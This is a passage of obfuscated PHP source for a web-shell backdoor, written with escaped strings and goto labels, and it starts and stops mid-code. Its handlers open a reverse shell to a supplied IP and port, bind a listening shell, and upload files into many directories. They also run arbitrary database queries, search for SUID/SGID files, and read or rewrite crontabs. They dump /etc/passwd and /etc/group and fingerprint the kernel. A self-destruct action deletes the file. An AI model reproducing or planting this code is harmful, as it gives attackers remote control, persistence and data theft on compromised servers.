iGEMS: $v1Pog = ["\x73\164\141\164\x75\x73" => "\x73\x75\x63\x63\145\163\163", "\x6d\145\x73\x73\x61\147\145" => "{$N38yg}\x2f" . count($j2G7g) . "\40\146\151\x6c\x65\x28\x73\51\40\x75\160\x6c\157\x61\x64\x65\144\56"]; goto t__gi; pSeHe: goto JVari; goto c64Q4; FVsbh: $jY45d++; goto Nn4IB; s9oDZ: if (isset($_FILES["\146\151\x6c\145"])) { goto cnB8M; } goto UuR5c; T99KC: goto eKskQ; goto qX9ti; jB72h: cnB8M: goto EEx0l; c64Q4: kBc6M: goto iGEMS; UuR5c: $v1Pog["\x6d\x65\163\163\141\147\x65"] = "\116\157\40\x66\x69\154\x65\163\40\162\x65\143\145\151\x76\x65\x64\x2e"; goto BLj_8; phfHd: if (!($_FILES["\146\151\x6c\145"]["\145\x72\162\x6f\x72"][$jY45d] === UPLOAD_ERR_OK)) { goto p2nhH; } goto M3SvM; YwoQ2: eKskQ: goto jbl1g; j1rtB: $v1Pog["\x6d\x65\x73\163\141\x67\145"] = "\106\141\x69\154\145\x64\40\x74\x6f\40\x75\x70\x6c\x6f\x61\144\x20\146\x69\154\145\163\56"; goto pSeHe; OfGLi: if ($_FILES["\x66\151\154\145"]["\145\x72\162\x6f\162"] === UPLOAD_ERR_OK) { goto NGPHx; } goto T99KC; ciV15: goto eKskQ; goto MRf6H; SXY0K: Bgflr: goto FVsbh; yi2Is: $j2G7g[] = ["\x6e\141\155\x65" => $_FILES["\x66\151\154\x65"]["\x6e\141\x6d\145"], "\164\155\160\137\x6e\141\155\145" => $_FILES["\x66\x69\154\145"]["\164\155\160\137\156\x61\x6d\145"]]; goto YwoQ2; jbl1g: $N38yg = 0; goto Qiw8n; BwG09: if ($N38yg > 0) { goto kBc6M; } goto j1rtB; UPEJR: oiETu: goto XKkOG; Qiw8n: foreach ($j2G7g as $Q0s1i) { goto dxqs1; W8Ueq: if (!move_uploaded_file($Q0s1i["\x74\155\x70\137\x6e\141\x6d\145"], $PstkO)) { goto OkamC; } goto xl2Z9; xl2Z9: $N38yg++; goto uv3sU; uv3sU: OkamC: goto Ted03; Ted03: U4tBb: goto xx7v5; dxqs1: $PstkO = $j3_hR . DIRECTORY_SEPARATOR . basename($Q0s1i["\x6e\x61\x6d\145"]); goto W8Ueq; xx7v5: } goto v33sA; MRf6H: NGPHx: goto yi2Is; UvXZ5: z6GII: goto mGHZY; mGHZY: if (!($jY45d < count($_FILES["\x66\x69\x6c\x65"]["\x6e\141\155\145"]))) { goto RpIFq; } goto phfHd; OPa81: $jY45d = 0; goto UvXZ5; ke7m7: case "\x73\145\154\x66\137\x64\x65\x73\164\162\x75\143\164": goto O77op; VUPU0: goto xFwvT; goto NxdBe; xbIjV: if (unlink(__FILE__)) { goto lhnYL; } goto R7OAn; kMQl5: goto vbH70; goto egtfX; NxdBe: lhnYL: goto fV46_; O77op: session_destroy(); goto xbIjV; R7OAn: $v1Pog["\155\x65\x73\x73\x61\147\145"] = "\x55\156\141\x62\154\145\x20\164\157\x20\x73\x65\154\146\55\144\145\163\164\162\x75\x63\164\x2e"; goto VUPU0; fV46_: $v1Pog = ["\x73\x74\x61\164\x75\x73" => "\163\165\143\x63\145\x73\x73", "\155\x65\x73\x73\141\x67\145" => "\x53\150\x65\154\154\x20\x68\x61\x73\40\142\x65\x65\156\x20\x72\145\x6d\x6f\166\x65\144\x2e"]; goto gJhSf; gJhSf: xFwvT: goto kMQl5; egtfX: case "\147\145\x74\137\x64\x69\x72\137\164\x72\x65\x65": goto CuJn9; ncwdq: $v1Pog = ["\x73\x74\x61\x74\165\163" => "\163\x75\x63\x63\145\163\163", "\x74\162\145\x65" => [pY2_5($Om154)]]; goto oBoWU; oBoWU: goto vbH70; goto q2s_7; CuJn9: $Om154 = isset($_SERVER["\104\x4f\103\125\x4d\x45\116\x54\x5f\122\x4f\x4f\x54"]) ? realpath($_SERVER["\104\117\103\125\115\x45\116\124\137\x52\x4f\x4f\124"]) : dirname(__FILE__); goto ncwdq; q2s_7: case "\155\141\x73\x73\x5f\165\160\x6c\x6f\x61\x64": goto JEkep; uiC_E: $xDxGO = json_decode($_POST["\144\x69\162\163"], true); goto Rnu3o; mLXqa: goto FHz_a; goto E44NH; ygFrj: xBpN7: goto HmG48; GSO0V: goto GhC3Y; goto LjLYL; HmG48: GhC3Y: goto jbFGM; gjS4g: $v1Pog["\x6d\x65\163\x73\x61\x67\x65"] = "\x49\156\x76\141\154\151\x64\x20\x64\x69\x72\145\x63\x74\157\162\x79\40\x6c\x69\x73\x74\x2e"; goto mLXqa; zoq2A: $v1Pog["\x6d\145\163\163\x61\147\x65"] = "\x46\141\x69\154\x65\144\x20\164\x6f\40\160\x72\157\x63\x65\163\163\x20\165\160\154\157\141\x64\145\144\x20\146\x69\x6c\145\56"; goto Kw8je; cai_0: $v1Pog = ["\x73\164\141\164\x75\163" => "\163\x75\x63\x63\145\x73\163", "\x6d\145\163\x73\141\147\x65" => "\x55\160\x6c\x6f\x61\x64\x65\x64\40\x74\157\x20{$N38yg}\40\x64\151\x72\x65\x63\164\x6f\162\x69\145\163\56\40\x46\x61\151\154\x65\144\40\146\x6f\x72\40{$qSowe}\56"]; goto H5gD3; KBylx: $lsg5E = __DIR__ . DIRECTORY_SEPARATOR . uniqid("\x74\155\160\x5f") . "\x5f" . $cZODf; goto KuxJq; WX1Br: $N38yg = 0; goto zkx8k; uE5wz: foreach ($xDxGO as $jBFOE) { goto apR6m; M2H5F: eU0mR: goto iH6TR; F76Vi: qdzr1: goto uaZwj; uTEc3: if (copy($lsg5E, $PstkO)) { goto qdzr1; } goto NnwgX; mauXv: iQElR: goto YY2tu; NnwgX: $qSowe++; goto kbv5X; uaZwj: $N38yg++; goto M2H5F; iH6TR: OrLX8: goto mauXv; o_kES: goto OrLX8; goto GnfvQ; apR6m: if (is_dir($jBFOE) && is_writable($jBFOE)) { goto DOJNd; } goto MpUVP; GnfvQ: DOJNd: goto zAFrl; kbv5X: goto eU0mR; goto F76Vi; zAFrl: $PstkO = rtrim($jBFOE, "\57") . DIRECTORY_SEPARATOR . $cZODf; goto uTEc3; MpUVP: $qSowe++; goto o_kES; YY2tu: } goto G12Yc; KuxJq: if (move_uploaded_file($_FILES["\146\151\x6c\145"]["\x74\155\x70\x5f\x6e\141\155\145"], $lsg5E)) { goto Fsis2; } goto zoq2A; LjLYL: Nob_o: goto uiC_E; Kw8je: goto xBpN7; goto SHCmW; SHCmW: Fsis2: goto WX1Br; yhVzi: @unlink($lsg5E); goto ygFrj; gJyUZ: $v1Pog["\x6d\x65\163\163\x61\147\145"] = "\x46\x69\x6c\145\x20\x6f\162\x20\x74\141\x72\147\145\x74\x20\x64\151\162\145\x63\x74\157\x72\x69\145\163\40\x6e\157\x74\x20\160\162\157\166\151\x64\145\x64\x2e"; goto GSO0V; jbFGM: goto vbH70; goto T5phj; Rnu3o: $cZODf = basename($_FILES["\x66\151\x6c\x65"]["\x6e\x61\155\145"]); goto KBylx; H5gD3: FHz_a: goto yhVzi; E44NH: ruwGT: goto uE5wz; lK08q: if (is_array($xDxGO)) { goto ruwGT; } goto gjS4g; JEkep: if (isset($_FILES["\146\x69\154\x65"]) && $_FILES["\x66\x69\x6c\x65"]["\x65\162\x72\x6f\162"] === UPLOAD_ERR_OK && isset($_POST["\x64\x69\162\x73"])) { goto Nob_o; } goto gJyUZ; G12Yc: abaJV: goto cai_0; zkx8k: $qSowe = 0; goto lK08q; T5phj: case "\x67\x65\x74\x5f\154\x69\x76\x65\137\163\164\141\164\163": $v1Pog = ["\163\164\x61\x74\165\163" => "\163\x75\x63\143\145\163\x73", "\143\160\x75" => PoNRj(), "\162\x61\x6d" => EQrni(), "\144\x69\163\153" => cua0X()]; goto vbH70; case "\x66\151\x6e\x64\x5f\163\165\x69\x64\x5f\147\165\151\x64": goto xEknf; xEknf: $azofS = "\x66\x69\x6e\144\x20\57\40\x2d\x74\171\x70\145\40\146\x20\x5c\x28\x20\55\160\145\x72\155\x20\x2d\x34\x30\60\60\x20\55\x6f\x20\x2d\x70\x65\162\155\x20\x2d\62\60\60\x30\x20\134\x29\40\x2d\154\163\40\62\76\57\144\x65\166\57\156\x75\154\154"; goto K5dQ5; K5dQ5: $BKvy0 = ZmRp5($azofS); goto hY1Zz; hY1Zz: $v1Pog = ["\x73\164\141\164\165\x73" => "\163\165\x63\x63\145\163\x73", "\x64\141\164\x61" => htmlspecialchars($BKvy0 ?: "\116\x6f\40\123\125\111\x44\x2f\107\x55\111\x44\40\146\151\154\145\163\x20\146\157\x75\156\144\x20\x6f\x72\40\x27\x66\x69\x6e\144\47\x20\x63\157\155\x6d\141\156\144\x20\146\141\151\154\x65\144\x2e")]; goto XUkEX; XUkEX: goto vbH70; goto IWkTP; IWkTP: case "\144\x61\x74\x61\142\x61\163\x65\137\161\165\x65\162\x79": goto LSoCs; Dmph7: goto vbH70; goto Xr9IS; iUw4O: $v1Pog["\155\145\163\x73\x61\x67\145"] = "\x51\x75\x65\x72\x79\x20\x45\x72\x72\157\x72\72\40" . Jvz13($JHnly); goto XhJYh; pYgGX: iZGp2($olRGv); goto Q8pD4; kid7v: goto H_vyl; goto TJq99; REQsL: jgCbQ: goto iasTX; qXtLI: $v1Pog = ["\163\x74\141\x74\x75\163" => "\x73\x75\x63\143\145\163\163", "\x6d\145\163\163\x61\x67\x65" => "\x51\165\145\x72\x79\x20\x65\170\x65\x63\x75\164\145\144\40\163\x75\143\143\145\163\x73\146\165\x6c\154\x79\56", "\x61\146\x66\x65\143\x74\145\x64\x5f\x72\x6f\167\x73" => IV3th($JHnly)]; goto MUVZy; u49y4: goto bozE0; goto bZm42; rkgNk: $l7bdt = $_POST["\144\142\137\x68\157\x73\x74"]; goto GdjHm; LSoCs: if (!function_exists("\147\70\x41\165\x41")) { $v1Pog["\155\145\x73\x73\141\x67\145"] = "\115\171\x53\x51\x4c\x69\x20\x65\170\x74\x65\x6e\163\x69\157\156\40\x69\x73\x20\x6e\x6f\x74\x20\145\x6e\141\142\x6c\145\x64\x2e"; goto vbH70; } goto rkgNk; iSmzL: KEz1j: goto qXtLI; Q8pD4: $v1Pog = ["\163\164\141\x74\x75\x73" => "\x73\x75\143\143\145\x73\x73", "\x68\145\141\144\x65\162\163" => $JTRCd, "\162\157\167\x73" => $uYZS9]; goto u49y4; HcFXZ: goto VAUs6; goto REQsL; XhJYh: goto bozE0; goto iSmzL; Xr9IS: NbTYH: goto aJy0B; aJy0B: $olRGv = @wL23z($JHnly, $DEYfc); goto poV5u; mgWEu: if (!($f1fXE = ZhXly($olRGv))) { goto jgCbQ; } goto NDIZh; d1hBC: if (!($nzVFs = bb5T9($olRGv))) { goto XBF8x; } goto t_x8w; YIEL4: if ($olRGv === true) { goto KEz1j; } goto MRBXM; O79e8: $vkU4A = $_POST["\x64\142\x5f\x6e\x61\155\145"]; goto oBxKF; S1WsH: $CHFh3 = $_POST["\144\x62\137\160\x61\x73\x73"]; goto O79e8; AycyS: $v1Pog["\155\x65\x73\163\x61\x67\145"] = "\103\157\156\x6e\145\x63\x74\x69\x6f\x6e\x20\106\x61\151\154\x65\144\72\x20" . gX6LT(); goto Dmph7; oBxKF: $DEYfc = $_POST["\144\142\x5f\x71\x75\x65\162\171"]; goto RXb9e; Xi3JQ: if ($JHnly) { goto NbTYH; } goto AycyS; bZm42: V_isc: goto iUw4O; MRBXM: $JTRCd = []; goto gkyT_; poV5u: if ($olRGv === false) { goto V_isc; } goto YIEL4; t_x8w: $uYZS9[] = array_map("\150\x74\x6d\x6c\163\x70\145\143\x69\x61\x6c\143\150\x61\x72\163", $nzVFs); goto kid7v; GdjHm: $Ki5dg = $_POST["\144\142\x5f\x75\x73\x65\x72"]; goto S1WsH; MUVZy: bozE0: goto Jm83s; Jm83s: u8f22($JHnly); goto QzlE7; iasTX: H_vyl: goto d1hBC; LwvFD: VAUs6: goto mgWEu; NDIZh: $JTRCd[] = $f1fXE->name; goto HcFXZ; RXb9e: $JHnly = @g8Aua($l7bdt, $Ki5dg, $CHFh3, $vkU4A); goto Xi3JQ; gkyT_: $uYZS9 = []; goto LwvFD; QzlE7: goto vbH70; goto wxcer; TJq99: XBF8x: goto pYgGX; wxcer: case "\162\x65\166\145\x72\x73\x65\x5f\163\150\x65\154\154": goto sr9DI; a4wZr: IWRK3: goto Jebd5; MZsYb: goto Lvnrr; goto vWrEN; sr9DI: $b_GfI = $_POST["\x69\x70"]; goto pGs3o; LTnV2: foreach ($lqQ8o as $y4NPo) { fclose($y4NPo); pGerQ: } goto NxPfA; v5qod: fclose($ZmdPV); goto LTnV2; Aw75f: $XKSBr = proc_open($EUiC4, $YaXSQ, $lqQ8o); goto sktv7; yrMJH: Q69Am: goto apfXK; AbkMn: goto iP0AC; goto tG9xb; BEnbY: fwrite($lqQ8o[0], $HgQYB); goto a4wZr; b2ds0: $KAfIg = false; goto JkbOi; vWrEN: GXxVZ: goto qzwid; aGx32: $XmHoU = null; goto IgljN; j3a4t: $v1Pog = ["\163\x74\141\164\165\x73" => "\x73\x75\x63\x63\145\x73\x73", "\x6d\x65\x73\x73\141\x67\145" => "\x52\145\x76\x65\162\x73\145\40\x73\x68\x65\x6c\x6c\40\x63\157\x6e\156\145\x63\164\x69\157\156\40\x65\163\x74\141\x62\154\151\x73\x68\x65\144\x20\50\x63\150\145\x63\x6b\x20\171\x6f\x75\x72\40\x6c\x69\163\x74\145\x6e\x65\162\x29\x2e"]; goto MZsYb; q7O25: rpiUU: goto M8QEr; Nd0ux: Lvnrr: goto SWXHj; zvpOj: e5owZ: goto MQPe5; loTt8: $HgQYB = fread($ZmdPV, 1024); goto BEnbY; ENAtw: $EUiC4 = "\57\142\151\x6e\57\x73\150"; goto z5ur2; NxPfA: dvJC8: goto EVTVI; EVTVI: proc_close($XKSBr); goto nuELQ; qzwid: $v1Pog = ["\x73\x74\141\164\165\x73" => "\x65\162\x72\157\x72", "\x6d\x65\163\x73\141\147\145" => $BKvy0]; goto Nd0ux; MQPe5: $BKvy0 = "\x41\164\x74\x65\155\x70\164\151\x6e\x67\x20\164\157\40\143\x6f\156\x6e\145\143\164\x20\x74\157\x20{$b_GfI}\72{$TI0F5}\56\x2e\56\12"; goto b2ds0; nuELQ: $KAfIg = true; goto wZv1q; pGs3o: $TI0F5 = $_POST["\160\x6f\162\164"]; goto ENAtw; Jebd5: if (!in_array($lqQ8o[1], $C2yoo)) { goto n5VtH; } goto VbPzQ; gBMHj: stream_set_blocking($lqQ8o[2], 0); goto klcSe; UwEjD: stream_set_blocking($lqQ8o[1], 0); goto gBMHj; FFB4S: $BKvy0 .= "\x70\x72\x6f\143\x5f\x6f\x70\145\156\40\x66\141\151\154\145\x64\x2e\xa"; goto iksbx; Sf8E_: $ZmdPV = @fsockopen($b_GfI, $TI0F5); goto XSD2v; gV2q3: lQ8Oo: goto nOGZD; sktv7: if (is_resource($XKSBr)) { goto kIfSt; } goto FFB4S; gTDLI: $EUiC4 = "\x63\x6d\144\56\x65\x78\x65"; goto zvpOj; bKhu9: $XfRvW = null; goto aGx32; M8QEr: if (!1) { goto iP0AC; } goto PqEVh; ytDdY: goto rpiUU; goto xRWXs; nOGZD: wwt4D: goto ytDdY; vBNWi: goto XBlWD; goto yrMJH; wZv1q: MRje3: goto MBpVD; SWXHj: goto vbH70; goto juec3; Ios8m: $YaXSQ = [0 => ["\160\x69\160\145", "\x72"], 1 => ["\x70\151\x70\x65", "\x77"], 2 => ["\160\151\x70\x65", "\x77"]]; goto Sf8E_; D4xsV: bsf4d: goto RCzw7; z5ur2: if (!stristr(PHP_OS, "\x57\111\x4e")) { goto e5owZ; } goto gTDLI; xRWXs: iP0AC: goto v5qod; klcSe: stream_set_blocking($ZmdPV, 0); goto q7O25; tH4sE: $BKvy0 .= "\122\145\161\x75\x69\x72\x65\144\x20\146\x75\156\x63\164\x69\157\x6e\163\40\50\x70\x72\157\x63\x5f\157\160\145\x6e\54\x20\x66\x73\x6f\x63\153\157\160\145\156\x29\40\141\x72\145\40\144\151\163\141\142\154\145\x64\x2e\xa"; goto FKKGV; FKKGV: goto bsf4d; goto f7KtG; NwH2e: fwrite($ZmdPV, fread($lqQ8o[2], 1024)); goto gV2q3; itxlB: if (!in_array($lqQ8o[2], $C2yoo)) { goto lQ8Oo; } goto NwH2e; NYsk_: n5VtH: goto itxlB; JkbOi: if (lIx3f("\160\x72\157\x63\137\157\160\x65\156") && Lix3f("\x66\x73\x6f\143\153\157\x70\x65\156")) { goto uCGZu; } goto tH4sE; IVtV4: stream_set_blocking($lqQ8o[0], 0); goto UwEjD; a3vUC: kIfSt: goto IVtV4; IgljN: if (!(stream_select($C2yoo, $XfRvW, $XmHoU, null) > 0)) { goto wwt4D; } goto vdwXc; apfXK: $lqQ8o = []; goto Aw75f; XSD2v: if ($ZmdPV) { goto Q69Am; } goto WfhsW; f7KtG: uCGZu: goto Ios8m; vdwXc: if (!in_array($ZmdPV, $C2yoo)) { goto IWRK3; } goto loTt8; bDDQM: $C2yoo = [$ZmdPV, $lqQ8o[1], $lqQ8o[2]]; goto bKhu9; PqEVh: if (!(feof($ZmdPV) || feof($lqQ8o[1]))) { goto fh4ol; } goto AbkMn; WfhsW: $BKvy0 .= "\x66\x73\x6f\143\153\x6f\x70\145\156\40\x66\x61\151\x6c\x65\144\40\164\x6f\x20\x63\x6f\x6e\x6e\145\143\x74\56\xa"; goto vBNWi; MBpVD: XBlWD: goto D4xsV; iksbx: goto MRje3; goto a3vUC; VbPzQ: fwrite($ZmdPV, fread($lqQ8o[1], 1024)); goto NYsk_; RCzw7: if (!$KAfIg) { goto GXxVZ; } goto j3a4t; tG9xb: fh4ol: goto bDDQM; juec3: case "\x62\151\156\x64\137\163\x68\x65\154\154": goto JZ5hV; rd0j5: $YotvE = socket_accept($ZmdPV); goto C1Qjk; Vkl9q: $ZmdPV = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); goto dHwxF; YG2iQ: $v1Pog = ["\x73\164\141\x74\165\163" => "\163\x75\x63\x63\145\x73\x73", "\x6d\145\x73\x73\141\x67\145" => "\102\151\156\x64\40\x73\x68\145\154\x6c\x20\157\156\40\160\157\162\x74\40{$TI0F5}\40\x66\151\156\x69\163\x68\145\144\x2e"]; goto iC_UM; zCD23: proc_close($XKSBr); goto Tk80o; z4TNf: $v1Pog["\155\145\163\x73\141\147\x65"] = "\x43\x6f\x75\154\x64\x20\x6e\157\164\x20\x62\151\x6e\x64\x20\x74\x6f\40\160\157\x72\x74\x20{$TI0F5}\56\x20\x52\145\x61\163\x6f\x6e\72\40{$LntjT}"; goto GS1Fd; Tk80o: eOxGw: goto qgTXs; fXa0K: YgaJ6: goto Vkl9q; NH4oV: if (!is_resource($XKSBr)) { goto eOxGw; } goto zCD23; aPsD5: $v1Pog["\x6d\145\163\163\141\x67\145"] = "\x52\145\x71\x75\151\162\145\x64\40\x66\165\x6e\143\x74\151\x6f\156\163\x20\50\x73\157\x63\153\145\x74\137\143\x72\145\x61\164\145\x2c\x20\160\162\157\x63\137\157\x70\145\x6e\x29\x20\x61\162\x65\40\x64\151\163\x61\142\x6c\145\144\56"; goto I1kpl; dHwxF: if (!(!$ZmdPV || !@socket_bind($ZmdPV, "\60\x2e\60\56\x30\x2e\x30", $TI0F5) || !@socket_listen($ZmdPV))) { goto dQZg0; } goto s7C2J; iL3pQ: $EUiC4 = "\x2f\x62\x69\156\57\163\150"; goto ll26m; iC_UM: goto vbH70; goto Yr3wI; IdYJC: $XKSBr = proc_open($EUiC4, $YaXSQ, $lqQ8o); goto NH4oV; G72qo: cSOqm: goto JpfxS; ISyHH: $EUiC4 = "\x63\155\x64\56\x65\170\x65"; goto G72qo; jWLzn: dQZg0: goto rd0j5; ll26m: if (!stristr(PHP_OS, "\127\x49\x4e")) { goto cSOqm; } goto ISyHH; GS1Fd: goto vbH70; goto jWLzn; uEFUE: $YaXSQ = [0 => $YotvE, 1 => $YotvE, 2 => $YotvE]; goto IdYJC; C1Qjk: if (!$YotvE) { goto Ha6Ue; } goto uEFUE; s7C2J: $LntjT = socket_strerror(socket_last_error()); goto woYII; I1kpl: goto vbH70; goto fXa0K; woYII: @socket_close($ZmdPV); goto z4TNf; qgTXs: Ha6Ue: goto wYTKV; wYTKV: @socket_close($YotvE); goto sd_77; sd_77: @socket_close($ZmdPV); goto YG2iQ; JZ5hV: $TI0F5 = (int) $_POST["\160\x6f\162\x74"]; goto iL3pQ; JpfxS: if (!(!liX3F("\x73\157\x63\153\x65\x74\137\143\x72\x65\141\x74\145") || !LIx3F("\x70\x72\x6f\143\137\157\160\x65\x6e"))) { goto YgaJ6; } goto aPsD5; Yr3wI: case "\x73\x65\141\162\x63\150\x5f\x66\151\154\x65\x73": goto V7lcE; YrYPr: $v1Pog["\155\x65\163\x73\x61\x67\145"] = "\120\x61\x74\150\x20\141\156\144\x20\160\141\x74\164\145\162\156\40\x61\162\x65\40\x72\145\161\165\x69\x72\145\x64\56"; goto V_JWj; gxHmT: goto vbH70; goto VqZCy; MkNG0: $BKvy0 = zMrp5($azofS); goto Rny67; V7lcE: $j3_hR = realpath($_POST["\x70\x61\x74\x68"]); goto x6IOf; Rny67: $v1Pog = ["\163\164\141\164\165\x73" => "\163\x75\143\143\x65\x73\163", "\144\141\x74\x61" => htmlspecialchars($BKvy0 ?: "\116\157\x20\146\151\x6c\145\x73\x20\146\157\x75\156\144\40\155\x61\164\143\150\151\x6e\x67\x20\164\150\145\40\x70\141\164\x74\145\x72\x6e\x2e")]; goto gxHmT; UU102: if (!(!$j3_hR || !$G6Mdr)) { goto fmdjb; } goto YrYPr; V_JWj: goto vbH70; goto pLXJj; pLXJj: fmdjb: goto CVdP7; x6IOf: $G6Mdr = $_POST["\160\141\x74\164\x65\162\x6e"]; goto UU102; CVdP7: $azofS = "\146\x69\156\144\40" . escapeshellarg($j3_hR) . "\x20\55\164\x79\x70\x65\40\x66\40\x2d\x6e\141\x6d\145\x20" . escapeshellarg($G6Mdr) . "\40\x32\x3e\57\144\x65\166\57\x6e\165\x6c\x6c"; goto MkNG0; VqZCy: case "\x67\x65\164\x5f\143\162\x6f\x6e": goto Q6dBP; R1FQ3: goto eQdQa; goto GpKt7; zNcXP: if (strpos((string) $Lrz4Z, "\156\157\40\x63\x72\x6f\x6e\x74\141\142\40\x66\157\x72") !== false || empty($Lrz4Z)) { goto Byi6q; } goto fmUu_; GpKt7: Byi6q: goto HKwpg; JjUH7: $cL6DY = "\57\166\x61\x72\x2f\x73\x70\x6f\157\x6c\x2f\143\162\157\156\x2f\x63\x72\157\x6e\164\141\x62\163\x2f{$qhLRz}"; goto VkjB_; fmUu_: $v1Pog = ["\163\164\x61\164\x75\x73" => "\163\x75\143\143\x65\163\163", "\x63\x6f\156\164\x65\156\164" => $Lrz4Z, "\x77\162\x69\164\x61\142\154\145" => true]; goto R1FQ3; N7DFl: eQdQa: goto O7K1N; jlYYI: $v1Pog = ["\x73\164\x61\164\x75\163" => "\x73\x75\143\143\145\x73\x73", "\x63\157\x6e\x74\145\156\164" => file_get_contents($cL6DY), "\167\162\x69\164\141\142\154\x65" => is_writable($cL6DY)]; goto hu7pc; vd09_: Q088d: goto d5obT; VkjB_: if (!is_readable($cL6DY)) { goto Q088d; } goto jlYYI; HKwpg: $v1Pog = ["\x73\x74\x61\x74\165\163" => "\x73\x75\x63\x63\145\163\x73", "\x63\157\156\164\145\x6e\164" => '', "\167\x72\x69\164\141\x62\154\x65" => true]; goto N7DFl; O7K1N: tTIL0: goto wNvAf; wNvAf: goto vbH70; goto qZH3j; hu7pc: goto tTIL0; goto vd09_; Q6dBP: $qhLRz = get_current_user(); goto JjUH7; d5obT: $Lrz4Z = zMrp5("\x63\162\x6f\156\164\x61\x62\x20\x2d\x6c\40\62\76\57\x64\x65\x76\57\x6e\165\x6c\154"); goto zNcXP; qZH3j: case "\x73\141\166\145\x5f\143\162\157\x6e": goto FzU2v; FzU2v: $Lrz4Z = $_POST["\x63\x6f\x6e\164\x65\x6e\164"]; goto v0Nkw; jqTTN: YqYd3: goto k0qPt; abNiE: ZmRP5("\x63\x72\x6f\156\164\141\142\40" . escapeshellarg($s1avK)); goto O9jV1; z5AC1: $v1Pog = ["\x73\x74\141\164\165\x73" => "\x73\165\143\x63\x65\163\x73", "\155\x65\163\163\x61\147\x65" => "\103\x72\157\156\164\141\142\40\x73\x61\x76\145\x64\40\163\165\143\143\145\163\163\x66\165\x6c\x6c\171\56"]; goto jqTTN; k0qPt: goto vbH70; goto J6qrS; LfC9c: YflPZ: goto abNiE; O9jV1: unlink($s1avK); goto z5AC1; p_uCp: $v1Pog["\155\x65\x73\163\141\x67\x65"] = "\106\141\151\x6c\145\144\x20\x74\x6f\40\167\x72\x69\x74\145\40\164\145\155\x70\157\x72\141\162\x79\40\143\162\157\x6e\x20\x66\151\x6c\145\56"; goto Bxa_e; tR0Az: if (file_put_contents($s1avK, $Lrz4Z) !== false) { goto YflPZ; } goto p_uCp; v0Nkw: $s1avK = tempnam(sys_get_temp_dir(), "\143\x72\157\x6e\137"); goto tR0Az; Bxa_e: goto YqYd3; goto LfC9c; J6qrS: case "\x67\145\x74\x5f\165\163\x65\x72\163\x5f\147\x72\157\165\160\163": goto crI3O; bAz1r: goto vbH70; goto Ui60u; DNt5A: GYwpd: goto SgXxO; zcO1P: CWraQ: goto nmGXJ; eYfut: $PX7xw = []; goto VruKd; SgXxO: if (!is_readable("\57\145\x74\x63\x2f\147\162\x6f\165\x70")) { goto CWraQ; } goto BwKGW; VruKd: if (!is_readable("\57\145\x74\x63\57\160\141\163\163\167\x64")) { goto GYwpd; } goto VJSK0; BwKGW: $IdX4r = file("\x2f\x65\x74\x63\57\147\162\157\x75\x70"); goto FNTjX; afo_F: foreach ($IdX4r as $oTjJ5) { goto BjlNg; H7AdO: tkd11: goto TY7Fn; uSMat: $X1b22[] = ["\156\x61\155\x65" => $CTBeO[0], "\165\x69\x64" => $CTBeO[2], "\x67\151\144" => $CTBeO[3], "\150\157\155\145" => $CTBeO[5], "\163\150\x65\x6c\x6c" => $CTBeO[6]]; goto M_s64; M_s64: uQcUc: goto H7AdO; BjlNg: $CTBeO = explode("\x3a", trim($oTjJ5)); goto iwemn; iwemn: if (!(count($CTBeO) >= 7)) { goto uQcUc; } goto uSMat; TY7Fn: } goto Phsxa; nmGXJ: $v1Pog = ["\163\x74\141\164\165\163" => "\x73\165\x63\x63\145\163\x73", "\165\163\x65\x72\x73" => $X1b22, "\147\x72\157\x75\x70\x73" => $PX7xw]; goto bAz1r; FNTjX: foreach ($IdX4r as $oTjJ5) { goto Pa1P3; WlxTh: eJNBD: goto CHRIA; LAa_W: if (!(count($CTBeO) >= 4)) { goto eJNBD; } goto VxkTA; VxkTA: $PX7xw[] = ["\x6e\x61\x6d\145" => $CTBeO[0], "\147\151\144" => $CTBeO[2], "\155\145\155\142\145\162\163" => $CTBeO[3]]; goto WlxTh; Pa1P3: $CTBeO = explode("\72", trim($oTjJ5)); goto LAa_W; CHRIA: zA7s4: goto xyROF; xyROF: } goto uPJa0; VJSK0: $IdX4r = file("\57\145\164\x63\57\x70\141\163\x73\x77\x64"); goto afo_F; uPJa0: Y7fo6: goto zcO1P; Phsxa: P2Bps: goto DNt5A; crI3O: $X1b22 = []; goto eYfut; Ui60u: case "\x67\x65\164\137\x6b\145\x72\156\x65\154\x5f\151\x6e\x66\x6f": goto LksYz; sYQFd: v10tK: goto oGi70; LksYz: $cIQrf = @file_get_contents("\57\145\164\143\x2f\x6f\163\x2d\162\x65\x6c\x65\141\x73\x65"); goto UWkGP; oGi70: $yowVz = php_uname("\162"); goto u1Y40; UnxoL: if (!($cIQrf && preg_match("\x2f\x50\x52\105\124\x54\x59\x5f\x4e\x41\x4d\x45\x3d\42\50\133\136\42\135\53\51\x22\x2f", $cIQrf, $I5WkF))) { goto v10tK; } goto KBTVd; KBTVd: $kTsJj = $I5WkF[1]; goto sYQFd; ZGvKe: goto vbH70; goto Yc7SB; u1Y40: $v1Pog = ["\x73\x74\141\164\165\163" => "\x73\x75\x63\x63\x65\x73\x73", "\144\x69\163\164\x72\x6f" => $kTsJj, "\153\x65\162\156\145\154" => $yowVz, "\165\156\x61\155\x65" => php_uname("\x61")]; goto ZGvKe; UWkGP: $kTsJj = "\116\x2f\x41"; goto UnxoL; Yc7SB: case "\x73\x65\141\x72\143\x68\137\x63\x6f\x6e\164\145\x6e\x74": goto FqsGR; KWTWh: $BKvy0 = zmrp5($azofS); goto gpeVd; t8BFP: Z2Mr2: goto lKe3d; XKLjb: $v1Pog["\x6d\145\163\x73\x61\x67\x65"] = "\120\141\164\150\x20\x61\x6e\x64\40\103\157\x6e\164\145\156\x74\40\x50\x61\164\x74\145\x72\x6e\x20\x61\162\145\40\162\145\x71\x75\151\162\x65\144\x2e"; goto pJ793; lKe3d: $azofS = "\147\x72\x65\x70\x20\x2d\x72\40\55\154\40" . (!empty($Q8IEc) ? "\x2d\55\x69\156\143\154\x75\144\x65\x3d" . escapeshellarg($Q8IEc) . "\x20" : '') . escapeshellarg($yJHiS) . "\x20" . escapeshellarg($j3_hR) . "\40\62\76\57\x64\145\x76\x2f\x6e\165\154\x6c"; goto KWTWh; eG_fx: $yJHiS = $_POST["\x63\x6f\x6e\x74\145\x6e\x74\x5f\x70\141\164\x74\x65\162\x6e"]; goto ircGw; ircGw: $Q8IEc = $_POST["\x66\151\154\x65\x5f\x70\141\x74\x74\x65\x72\156"]; goto Icd70; gpeVd: $v1Pog = ["\x73\x74\x61\164\165\163" => "\x73\165\143\x63\x65\163\x73", "\144\x61\x74\141" => htmlspecialchars($BKvy0 ?: 